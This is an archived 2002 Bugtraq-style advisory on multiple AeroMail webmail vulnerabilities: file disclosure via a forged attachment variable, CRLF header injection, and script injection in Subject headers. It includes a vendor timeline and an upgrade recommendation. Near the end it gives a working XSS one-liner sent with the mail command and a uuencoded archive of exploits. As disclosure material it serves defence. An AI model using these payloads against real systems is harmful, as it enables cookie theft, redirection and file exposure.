OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Ulf Harnhammar (ulfhupdate.uu.se)
Date: Sun Mar 03 2002 - 14:26:05 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    AeroMail multiple vulnerabilities

    PROGRAM: AeroMail
    VENDOR: Mark Cushman (markcushman.net)
    HOMEPAGE: http://the.cushman.net/projects/aeromail/
    MIRROR: http://www.packetplay.com/projects/aeromail/
    VULNERABLE VERSIONS: all versions below 1.45
    SEVERITY: medium to high

    DESCRIPTION:

    "AeroMail is a Web-based email client written in PHP. It uses an IMAP server
    to read and store messages in one or more user-defined folders, and its
    features include HTTP authentication for login (no cookies), folder
    manipulation, support for sending and viewing attachments, inline image
    display, multilanguage support, and URL highlighting."
    (direct quote from the program's project page on Freshmeat)

    AeroMail is released under the terms of the GNU General Public License.
    It seems to have quite a few users.

    ISSUES:

    1) When sending e-mails, you can trick the attachment subsystem into sending
    local files from the web server or remote files from URL's instead of uploaded
    files as it should.

    How is that possible? Well, after PHP has uploaded a file, it sets a few
    variables with information about it. One of them is the filename under which
    the uploaded file has been temporarily stored. It is important to check that
    this variable was set by uploading a file. It might also be normal POSTed
    data, in which case you end up with this problem.

    2) You can add additional headers to outgoing e-mail messages by sending some
    normal data for the To or Cc or Subject fields, a CRLF and then another header
    with some data. (A lot of other programs allow this too. It's not just
    AeroMail.) This can be used for adding uuencoded attachments up in the headers
    with lines ending in CR instead of CRLF, as previously discussed here on
    Bugtraq.

    3) JavaScript and HTML code is active, when Subject headers are displayed.
    This allows DOS attacks by redirecting, theft of cookies etc.

    Issues 1 and 2 require a valid user/password combination to be exploited,
    while issue 3 is open to anyone.

    The vendor was contacted with an explanation, two exploits and a patch on the
    23rd of February. Version 1.45, which is not vulnerable to any of these
    issues, was released on the 27th of February.

    RECOMMENDATION:

    I recommend that all users upgrade to version 1.45 immediately.

    EXPLOITS:

    Here are HTML exploits for issues 1 and 2. They are distributed as a
    uuencoded, gzipped tar archive.

    Issue 3 doesn't need a special exploit - you just send an ordinary mail:

    mail -s '<script>self.location.href="http://www.kuro5hin.org/"</script>' \
    metaurprontomail.com < /dev/null

    // Ulf Harnhammar
    metaurprontomail.com

    begin 644 aeromail_exploits.tar.gz
    M'XL("!9RCP``V%E<F]M86EL7V5X<&QO:71S+G1A<#M5FUOVS80]F?]BJL&
    M;"TPF[(MQYEG!VT<`PF0-Z0.VGT*:(FVV$FB1E)QLU^_HR0G?EOL8AG:;GP`
    M03B2]\KCW5$F14)Y?,<^9['6I':B\/S?*_;Z>#?\[H'_LJ_0LWK^K[G=YM>
    MLU7#K^MW:]!Y>5,VD2M-)4`MCZ?/G]NQ_YV";MS_^DJS$>DD_B<ZO*;G'?C^
    MW]U_J]-NK]U_%]=JX+V4D\_A?W[__5<G5\/Q;]<C.!U?G,/U[?'YV1#<.B$?
    MVD-"3L8GY8;?\)HPEC157'.1TIB0T:7KN)'668^0^7S>F+<;0L[(^(:8A/%)
    M+(1BC5"'[I'3-TOFQVB(/\UUS([>8:9=8*;!J,PT:/9)N>/T$Z8I&.%U]D?.
    M[P?N4*2:I;H^?LB8"T%)#5S-/NM"WZ\01%0JI=<B?KA8>>7>M,H)J5*IS\1
    MX0-,9H&(A1RX/TP+N&`$(%FFHLQ3W]?(NDJ[=ROTL:CYE8_<!EU3H5,`%V)
    M1#APKZ_>CU%B8.(W6`[</<>UI!&(Y/'Q$<72\"YA2M$9:V11AJH^2*[1:9\
    M0!]C(]ETX)JS6O1,M'+Y-I,8EH+?"'./;N,IG/Y(<XR.3".:)%3V"3UR>`HM
    M?'>-?F:,Y&F6:]`85[2*AR%+74AII1D.I=(W=,X1_+L\OCJHPN*_XF$<=X9
    MBUY_(H]699B(+B1HL3C?08;BK#,,=C`%P2;3.ZUI$,'K>40U3'G,0$BXO3D'
    M+<#$ZLT.F;37Y*[<(HP'9",*C4/5W7=F:/PFIN`:Z9^AD]8*"3CDE0PEPJ
    M3V>C3U<P83/<$_DLV_2PKI6\QI>?[AFAV&K7)<1VS%^3F/8YP"&<LQ#0
    M5G/BXNQBY)BT9U+M:8TAMEBS-2Y&R'Y2=?%6UZ4Z+LVRF`?4/`0B`LUT76G)
    M:+)0]#Z??&*!WJ%$E:<V<^487WK%:\Y3%%VQF!KA1SA>=-%8E5R8AU8G&T
    M$K*B%E4E7#^&9?'.<<EPFE=N.(17Y2<HMA][=*^%W;W_]:_WO^[IN?;_O]5
    M\$WU_]9_I/^WOJ?^?RDTZ\&)2'_2D$G4"*/+\>&Z-1T.M-/8HJ-K^PGIL70
    M]`'$M-A9U$SUJ/$6LDV$\2VKW59>=C_;2PL][LP2F3#%!2T:V?=EH]0`V2
    MF&JW%(;Y?]Q2%DSQ\PFV\S!\A"]S;.0:M;(\X9:4MA>,H7"E,TA$7)IW^\]
    M;\HS45U,-5544Y&RY:#NY*RFD(K=^S+><F:H>+^,M1P,=HX#R_FQ.A.LW<KC
    M*+#M:C:?YU/L.TMWLTCUI]V#O5+%CAL6%A86%A86%A86%A86%A86%A86%A;?
    +'/X"S&R_G``H````
    `
    end